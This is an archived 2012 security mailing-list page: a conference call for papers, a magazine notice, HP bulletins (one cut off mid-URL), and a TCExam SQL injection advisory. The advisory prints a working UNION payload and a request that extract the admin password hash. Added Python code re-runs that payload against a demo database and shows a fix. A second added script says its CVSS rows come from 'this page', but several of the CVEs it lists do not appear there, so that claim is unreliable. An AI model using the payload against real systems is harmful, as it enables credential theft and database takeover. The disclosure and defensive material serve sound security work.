GreHack 2012 - LAST Call For Papers (Grenoble, France) till 15th August 2012

2012-08-14 Thread Fabien DUCHENE
--
*GreHack 2012* LAST Call For Papers .. till 15th August 2012.
--
http://grehack.org GreHack 2012 conference will take place in Grenoble
(Alps), France on October 19th-20th 2012 and brings together students,
academia, industry and government to exchange knowledge around
emerging issues in the security + hacking world. During the night, a
Capture The Flag will take place. Each paper is peer reviewed at least 3 times.

-
*Suggested Topics (not limited to)*
-
http://grehack.org/en/index.php/GreHack_2012-Call_For_Papers-english/
- Track: ethical, legal and philosophical
-- greyhat hacking: a consumer advance, or a risk for worldwide security?
-- current state of laws relative to cyber-security and hacking +
justified suggestions of modifications

- Track: technical
-- Hadopi: why is it a technical and legal failure? How to exploit in-memory
vulnerabilities of Hadopi-approved software?
-- In-Memory Vulnerabilities
  --- Windows 8: heap analysis, kernel structures and new memory protections
  --- Exploit Corner: come present us your last sploit!
-- Hardcore Penetration Testing
  --- Code obfuscation to complicate Reverse Engineering
  --- Discreet attacks (eg: without writing to the filesystem)
  --- Hypervisor evasion
  --- Vulnerabilities and exploits on defensive security tools (eg:
AntiMalwares, Firewalls, IDS)
-- Attacking Infrastructures
  --- Internet: how to root your ***box? Which security
functionalities (and properties) are provided? How to bypass them?
  --- ipsec, ipv6
  --- routing protocols
  --- wireless: 802.11, 3G and 4G networks, WiMAX, RFID
  --- sensor networks
-- Malwares and Botnets
  --- state of the art of botnet redundancy mechanisms
  --- self-code modification (polymorphism) of malware
  --- ability of anti-malware to detect slightly mutated samples
  --- vulnerabilities in anti-malware drivers

- Track: research
-- Learning and Offensive Security
  --- static and dynamic analysis
  --- dumb/simple/basic fuzzing and smart-fuzzing for automating
vulnerability detection
  --- metrics for exploitability of vulns (in memory, web)
  --- model checking
  --- advances in reverse-engineering automation and model inference
  --- concolic execution
-- Hardware Attacks
  --- nanotechnology
  --- fault injection in memory via laser
  --- smart cards
  --- transportations
  --- medical tools
  --- embedded malwares
-- Cryptology
  --- influence of the environment on PRNG entropy
  --- mathematical aspects of current cryptology
-- Defensive Security
  --- Trust Based Computing
  --- New Access Control Models for process isolation
  --- New H/W + S/W for increasing the cost of exploitation

*Remark*
- We highly encourage original topics that break with traditional
research directions
- We will favor presentations with tools demonstrations or results

-
*Important Dates*
-
- CFP Opens: 1st May 2012
- CFP Closing Date: EXTENDED to 15th August 2012 (due to several
requests; was initially 15th July 2012)
- Final speakers List online: 09 September 2012
- Conference Dates: 19 October 2012 9am-7pm
- Capture The Flag: night (19 October 2012 9pm till 20 October 2012
6am Paris time :)

-
*Program Committee*
-

- Dan Alloun (Intel)
- Florent Autreau (Mataru)
- Claude Castelluccia (INRIA)
- Fabien Duchene (LIG)
- Philippe Elbaz-Vincent (UJF)
- Karim Hossen (LIG)
- Pascal Lafoucarde (VERIMAG)
- Arnaud Maillet (Evidian RD, Ensimag student)
- Pascal Malterre (CEA)
- Sanjay Rawat (LIG)
- Guillaume Touron (Ensimag student)
- Marie-Laure Potet (VERIMAG)
- anonymous researcher (private company in vulnerability research)

-
*Invited Talks*
-
- Eric Freyssinet (LIP6, Gendarmerie) Botnet: From Observation to Investigation
- Christophe Devine (ANSSI) mobile telephony security: a comparative
study. To what degree can we trust mobile operating systems and
radio protocols?
- Philippe Elbaz-Vincent (UJF) attacks on randomness of hardware Prime
Random Number Generator
- Regis Leveugle (TIMA) attacks on secure hardware
- Kostya Kortchinsky (Microsoft and formerly Immunity Inc.) - TBA

-
*Speaker Benefits*
-
- Free pass to the conference
- Accommodation during the Conference (1 night)
- GreHack will contribute to travel expenses (limited budget)

-
*Submission Guidelines*
-
Call for Papers is open till 15th August 2012.
Consider submitting even if your topic is not listed above.
http://grehack.org/index.php/GreHack_2012-Call_For_Papers-english
send your submission to: grehack-program_committee _A_T_ car-online.fr

-
*Capture The Flag*
-
http://grehack.org/index.php/GreHack-2012-Capture_The_Flag_rules-english


[Announcement] ClubHack Magazine's Aug 2012 Issue Released

2012-08-14 Thread abhijeet
Hello Readers,

ClubHack Magazine's Issue 31 - August 2012 is here.
 
This issue covers following articles:-

0x00 Tech Gyan - Malware Memory Forensics
0x01 Tool Gyan - Tamper Data
0x02 Mom's Guide - Apple iOS vulnerabilities
0x03 Legal Gyan - VARIOUS AUTHORITIES UNDER THE IT ACT
0x04 Matriux Vibhag - Matriux Ec-Centric
0x05 Poster - Security by luck, not possible

PDF version can be downloaded from: http://www.chmag.in/issue/aug2012.pdf
Check http://chmag.in/ for all the articles.

Articles, feedback and suggestions are welcome. Please send your bouquets or
brickbats to i...@chmag.in

--
Regards,
Team CHMag
http://chmag.in


TCExam Edit SQL Injection

2012-08-14 Thread research
/---\
| TCExam Edit SQL Injection |
\---/


Summary
===

TCExam 11.3.007 is prone to a SQL injection flaw located in
tce_edit_answer.php and tce_edit_question.php. These files pass a
'subject_module_id' parameter into a SQL statement without satisfactory
sanitisation. An attacker with authoring permissions could leverage this
vulnerability to take full control of the database.

CVE number: CVE-2012-4237
Impact: High
Vendor homepage: http://www.tcexam.org/
Vendor notified: 06/08/2012
Vendor fixed: 06/08/2012
Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html


Affected Products
 

Confirmed in TCExam 11.3.007. Prior versions may also be affected.


Details
===

The 'subject_module_id' parameters in the tce_edit_answer.php and
tce_edit_question.php pages were found to be subject to a SQL injection
vulnerability. It was possible to inject arbitrary SQL statements into a
WHERE clause, retrieving information from the database via the page output.
The attacker must be authenticated as a valid user with a permission level
of 5 or above in order for the attack to be successful.

The following payload will extract the admin password hash (some characters
may need to be URL encoded):

99.9 union all select (select
concat(0x7e,0x27,tce_users.user_password,0x27,0x7e) from `tcexam`.tce_users
where tce_users.user_name = CHAR(97,100,109,105,110) limit 0,1)
,0x0,0x0,0x0,0x0,0x0--

---
Example Request:
+---

GET /TCExam/admin/code/tce_edit_answer.php?subject_module_id=99.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ctce_users.user_password%2C0x27%2C0x7e%29+from+%60tcexam%60.tce_users+where+tce_users.user_name+%3d+CHAR(97,100,109,105,110)+limit+0%2C1%29+%2C0x0%2C0x0%2C0x0%2C0x0%2C0x0--&question_subject_id=3&answer_question_id=7 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php
Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df

---
Example Response:
+

--- SNIP ---
<select name="question_subject_id" id="question_subject_id" size="0"
onchange="document.getElementById('form_answereditor').changesubject.value=1;
document.getElementById('form_answereditor').submit();" title="test topic">
<option value="~'c574b5b09ab10f4f39ae9dce6d539cf0'~">1. - [%00]</option>
</select>
--- SNIP ---

Impact
==

An authenticated user with a permission level of 5 or higher could take full
control of the database, essentially allowing them to escalate their
privileges by either directly controlling the database, cracking an
administrator password or potentially changing their own permission level.
Furthermore, an attacker might be able to leverage this vulnerability in
order to further compromise the host machine.

Solution


Upgrade to TCExam 11.3.008.


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk
 

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:


http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
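
The mechanics behind the payload above, as an added example that is not part of the advisory or of TCExam's code: a six-column lookup built by string concatenation lets "99.9 union all select ..." append an attacker-chosen row whose first column carries the admin hash wrapped in ~'...'~ markers, so it surfaces inside the <option value> of the page output and can be scraped with a regex. The schema is constructed for the demo (only the tce_users / user_name / user_password names come from the advisory), the query shape is an assumption about how the page builds its WHERE clause, and the MySQL payload is translated to SQLite syntax (|| for concat(), char() for the 0x7e/0x27 literals, a single LIMIT) so it runs offline. The hardened form shows the two checks a practitioner wants: an allow-list on the parameter type and a bound parameter.

```python
import re
import sqlite3

# Constructed demo schema. Six columns in the subjects table, matching the
# six-column SELECT the advisory's payload pads with ",0x0,0x0,0x0,0x0,0x0".
SCHEMA = """
CREATE TABLE tce_subjects (
    subject_id INTEGER, subject_name TEXT, subject_module_id INTEGER,
    col4 TEXT, col5 TEXT, col6 TEXT);
CREATE TABLE tce_users (user_id INTEGER, user_name TEXT, user_password TEXT);
INSERT INTO tce_subjects VALUES (3, 'test topic', 1, '', '', '');
INSERT INTO tce_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# The advisory's MySQL payload translated to SQLite syntax. char(126) is '~',
# char(39) is "'", char(97,100,109,105,110) is 'admin'; 99.9 matches no real
# module id, so the UNIONed row is the only one the page renders.
PAYLOAD = ("99.9 union all select (select char(126)||char(39)||tce_users.user_password"
           "||char(39)||char(126) from tce_users where tce_users.user_name = "
           "char(97,100,109,105,110) limit 1),0,0,0,0,0--")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, subject_module_id: str):
    # Vulnerable pattern (assumed shape): the request parameter is spliced
    # straight into the WHERE clause, so it can close the clause and add a UNION.
    sql = ("SELECT subject_id, subject_name, subject_module_id, col4, col5, col6 "
           "FROM tce_subjects WHERE subject_module_id=" + subject_module_id)
    return conn.execute(sql).fetchall()


def render_options(rows) -> str:
    # Mimics the <select> in the advisory's response: column 1 becomes the value.
    return "".join(f'<option value="{r[0]}">{r[1]}</option>' for r in rows)


HASH_MARKER = re.compile(r"~'([0-9a-f]{32})'~")


def extract_marked_hash(html: str):
    # The attacker's ~'...'~ delimiters make the hash trivial to pull out of HTML.
    m = HASH_MARKER.search(html)
    return m.group(1) if m else None


def hardened_lookup(conn, subject_module_id: str):
    # Defence in depth: reject anything that is not an integer id, then bind the
    # value as a parameter so it can never change the structure of the query.
    if not re.fullmatch(r"[0-9]{1,10}", subject_module_id):
        raise ValueError("subject_module_id must be an integer id")
    sql = ("SELECT subject_id, subject_name, subject_module_id, col4, col5, col6 "
           "FROM tce_subjects WHERE subject_module_id=?")
    return conn.execute(sql, (int(subject_module_id),)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    html = render_options(vulnerable_lookup(conn, PAYLOAD))
    print("leaked via vulnerable lookup:", extract_marked_hash(html))
    try:
        hardened_lookup(conn, PAYLOAD)
    except ValueError as e:
        print("hardened lookup rejected payload:", e)
    print("hardened lookup, legitimate id:", hardened_lookup(conn, "1"))
```

The column count and the 99.9 trick are the two things to note: UNION only succeeds when the attacker pads to the exact number of columns the original SELECT returns, and a non-matching value for the real predicate keeps the legitimate rows out of the way so the injected row is the one the page prints.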



[security bulletin] HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information

2012-08-14 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03447824

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447824
Version: 1

HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote
Unauthenticated Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote unauthenticated disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Fortify
Software Security Center. The vulnerability could be remotely exploited to
allow unauthenticated disclosure of information.

References: CVE-2012-3248, FLC01

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on
Windows, Linux and Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3248(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has provided patches for HP Fortify Software Security Center v3.1, v3.3,
v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP
Fortify support at fortifytechsupp...@hp.com to receive instructions on how
to download the patches.

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAlApNA4ACgkQ4B86/C0qfVnHngCcCK7g6DUKLL2Y17qv5EjzZjXM
wm8AoMCpGpka9JsF+OTfrWcJDDfBdlUr
=GAbD
-END PGP SIGNATURE-
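
A small check for the CVSS 2.0 tables printed in this and the following HP bulletins, added here as an example and not HP's own code: it recomputes each Base Score from its Base Vector so that a reader triaging a batch of bulletins can confirm the published numbers. The weights and formula are the CVSS v2 base-metric constants (assumed known from the specification; the page itself only references HPSN-2008-002). The table rows are copied from the bulletins on this page.

```python
import re

# CVSS v2 base-metric weights (from the CVSS v2 specification).
AV = {"L": 0.395, "A": 0.646, "N": 1.0}      # access vector
AC = {"H": 0.35, "M": 0.61, "L": 0.71}       # access complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}      # authentication
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}     # confidentiality / integrity / availability

VECTOR_RE = re.compile(
    r"\(?AV:(?P<av>[LAN])/AC:(?P<ac>[HML])/Au:(?P<au>[MSN])/"
    r"C:(?P<c>[NPC])/I:(?P<i>[NPC])/A:(?P<a>[NPC])\)?")


def round_half_up(x: float, ndigits: int = 1) -> float:
    # CVSS rounds to one decimal, half up; Python's round() is banker's rounding.
    factor = 10 ** ndigits
    return int(x * factor + 0.5) / factor


def cvss2_base_score(vector: str) -> float:
    m = VECTOR_RE.fullmatch(vector.strip())
    if not m:
        raise ValueError(f"not a CVSS v2 base vector: {vector!r}")
    g = m.groupdict()
    impact = 10.41 * (1 - (1 - CIA[g["c"]]) * (1 - CIA[g["i"]]) * (1 - CIA[g["a"]]))
    exploitability = 20 * AV[g["av"]] * AC[g["ac"]] * AU[g["au"]]
    f_impact = 0 if impact == 0 else 1.176
    return round_half_up((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact)


# One bulletin row: "CVE-YYYY-NNNN(AV:../AC:../Au:../C:../I:../A:..)   score"
ROW_RE = re.compile(r"^(CVE-\d{4}-\d{4,})\s*(\([^)]*\))\s+([\d.]+)\s*$")


def check_bulletin_table(text: str):
    """Parse bulletin rows and return (cve, published, computed, matches) per row."""
    results = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        cve, vector, published = m.group(1), m.group(2), float(m.group(3))
        computed = cvss2_base_score(vector)
        results.append((cve, published, computed, computed == published))
    return results


# Rows copied from the HP bulletins on this page.
HP_TABLE = """
CVE-2012-3248(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
CVE-2012-3249(AV:N/AC:M/Au:S/C:P/I:N/A:N)   3.5
CVE-2012-3250(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
CVE-2012-3251(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
CVE-2012-0508(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-0551(AV:N/AC:M/Au:N/C:P/I:P/A:N)    5.8
CVE-2012-1720(AV:L/AC:H/Au:N/C:P/I:P/A:P)    3.7
CVE-2012-1726(AV:N/AC:L/Au:N/C:P/I:P/A:N)    6.4
"""

if __name__ == "__main__":
    for cve, published, computed, ok in check_bulletin_table(HP_TABLE):
        print(f"{cve}: published {published} computed {computed} "
              f"{'OK' if ok else 'MISMATCH'}")
```

Vectors are parsed with or without the surrounding parentheses that HP prints, and a vector with no C/I/A impact scores 0.0 by the f(Impact) rule rather than a negative number.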


[security bulletin] HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote Disclosure of Privileged Information

2012-08-14 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03447895

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447895
Version: 1

HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote
Disclosure of Privileged Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote disclosure of privileged information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Fortify
Software Security Center. The vulnerability could be remotely exploited to
allow disclosure of privileged information.

References: CVE-2012-3249, FLC02

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on
Windows, Linux and Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3249(AV:N/AC:M/Au:S/C:P/I:N/A:N)   3.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has provided patches for HP Fortify Software Security Center v3.1, v3.3,
v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP
Fortify support at fortifytechsupp...@hp.com to receive instructions on how
to download the patches.

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAlApOTwACgkQ4B86/C0qfVltowCfYhdJ12AVyNXUDwAMssvCvHu3
O/EAn1ABGtPFd2/EekJxvSMBzg1XyX6J
=Rb/z
-END PGP SIGNATURE-


[security bulletin] HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS)

2012-08-14 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03447828

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447828
Version: 1

HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center
Server, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Service
Manager and HP Service Center Server. The vulnerability could be remotely
exploited resulting in a Denial of Service (DoS).

References: CVE-2012-3250

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager Server 9.30, 9.21, and 7.11.
HP Service Center Server 6.28.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3250(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following patch kits available to resolve these
vulnerabilities.

HP Product Versions
 Platform / Patch Kit URL

SM9.30P4 Server
 Windows Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415197?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415197&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HP Itanium Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415199?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415199&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

Linux Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415195?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415195&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

Solaris Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415192?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415192&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

AIX Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415201?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415201&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SM9.21P5 Server
 Windows Server 9.21.013
 http://support.openview.hp.com/selfsolve/document/KM1036626?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1036626&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HP Itanium Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396806?searchIdentifier=-72890797%3a138eb464d5e%3a62d5&resultType=document&documentURL=KM1396806&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HP parisc Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396804?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1396804&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

Linux Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396802?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1396802&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

Solaris Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396801?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1396801&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

AIX Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396808?searchIdentifier=-72890797%3a138eb464d5e%3a62d5&resultType=document&documentURL=KM1396808&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SM7.11P19 Server
 Windows Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448273?searchIdentifier=-72890797%3a138eb464d5e%3a6481&resultType=document&documentURL=KM1448273&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HP Itanium Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448276?searchIdentifier=-72890797%3a138eb464d5e%3a6481&resultType=document&documentURL=KM1448276&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HP parisc Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448274?searchIdentifier=-72890797%3a138eb464d5e%3a6481&resultType=document&documentURL=KM1448274&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

Linux x86 Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448277?searchIdentifier

[security bulletin] HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web Tier, Remote Cross Site Scripting (XSS)

2012-08-14 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03450382

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03450382
Version: 1

HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web
Tier, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Service
Manager and HP Service Center Web Tier. The vulnerability could be remotely
exploited resulting in cross site scripting (XSS).

References: CVE-2012-3251

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager Web Tier 9.30, 9.21, and 7.11.
HP Service Center Web Tier 6.28.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3251(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following patch kits available to resolve these
vulnerabilities.

HP Product Versions
 Patch Kit URL

SM9.30P4 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1415193?searchIdentifier=-72890797%3a138eb464d5e%3a5a08&resultType=document&documentURL=KM1415193&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SM9.21p5 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1396812?searchIdentifier=-72890797%3a138eb464d5e%3a5a66&resultType=document&documentURL=KM1396812&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SM7.11p19 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1448272?searchIdentifier=-72890797%3a138eb464d5e%3a5957&resultType=document&documentURL=KM1448272&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SC6.2.8.10 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1320938?searchIdentifier=-72890797%3a138eb464d5e%3a5a86&resultType=document&documentURL=KM1320938&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
